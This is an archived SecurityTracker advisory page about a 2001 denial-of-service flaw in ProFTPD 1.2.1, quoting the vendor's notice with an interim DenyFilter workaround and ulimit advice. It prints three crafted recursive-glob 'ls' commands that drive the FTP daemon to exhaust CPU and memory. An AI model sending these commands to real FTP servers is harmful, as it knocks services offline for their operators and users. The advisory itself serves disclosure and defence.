SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (File Transfer/Sharing)  >   ProFTPD Vendors:   ProFTPd
ProFTP Denial of Service Vulnerability Allows Remote Users to Crash the FTP Process or the Entire Server
SecurityTracker Alert ID:  1001114
SecurityTracker URL:  http://securitytracker.com/id/1001114
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 19 2001
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 1.2.1; earlier versions likely
Description:   ProFTP is confirmed to be vulnerable to certain remote denial of service attacks. By sending certain unusually formatted commands, remote users may cause the FTP process to crash or the server to crash.

Commands that may cause this condition include:

ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/

The vendor reports that other similar commands may also cause the same behavior.

This issue has been assigned ProFTPD Bug ID: 1066. See:
http://bugs.proftpd.org/show_bug.cgi?id=1066

Impact:   A remote user can cause the ProFTP daemon process to consume all available CPU and memory resources, potentially causing either the process or the server to crash.
Solution:   The vendor is preparing a patch for the 1.2.1 source code. In the meantime, the vendor makes some interim recommendations (see the original source report).
Vendor URL:  www.proftp.org (Links to External Site)
Cause:   Input validation error, Resource error

Message History:   This archive entry has one or more follow-up message(s) listed below.
(Debian Package Still Vulnerable) Re: ProFTP Denial of Service Vulnerability Allows Remote Users to Crash the FTP Process or the Entire Server
A user reports that the version shipped with Debian Linux is still vulnerable.



 Source Message Contents

Subject:  [SECURITY] DoS vulnerability in ProFTPD


ProFTPD Bug ID: 1066
  (http://bugs.proftpd.org/show_bug.cgi?id=1066)


Versions affected:
  ProFTPD 1.2.1 is vulnerable. Earlier versions are also believed to be
  affected.


Problem commands:
  Problem commands include:
  ls */../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
  ls */.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/*/.*/
  ls .*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/.*./*?/

  Other commands of this style may also cause the same behavior; the exact
  commands listed here are not necessary to trigger.


Effect:
  The daemon process starts to consume all CPU and memory resources
  available to it.  Multiple simultaneous instances will result in faster
  depletion of resources, causing either the daemon process or the server
  to crash.


Fix / Workaround:
  A patch against the 1.2.1 source is currently being worked on.  However,
  given the nature of the problem and the lack of time given between
  notification and publication of the vulnerability, it is not ready for
  release yet.

  Until a more permanent fix is ready, we recommend adding the following
  directive in the <Global> context which should catch most variants of this
  problem.

  DenyFilter \*.*/

  We also recommend that the daemon process is started with appropriate
  ulimits set to control the system resources that can be utilized by the
  running daemon.  This should help in maintaining a viable server
  regardless attacks being made.  The development team is looking into
  modifying ProFTPD to provide native ulimit functionality.


Summary:
  The ProFTPD development team is aware of this issue and will be
  looking into providing a proper patch shortly.  Details of any patch
  or new version will be released on http://www.proftpd.org/.

  Additionally, the administrators of ftp.proftpd.org would like to thank
  Frank Denis for testing his theory about the vunerability by launching a
  denial of service attack against that server, causing it to become
  unavailable for a period of time.

  All security issues regarding ProFTPD should be directed to
  security@proftpd.org. Details on the mailing lists for the ProFTPD
  Project can be found at http://www.proftpd.org/

--
The Flying Hamster <hamster@suespammers.org>         http://hamster.wibble.org/
Everyone who visits a psychatrist should have his head examined.

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC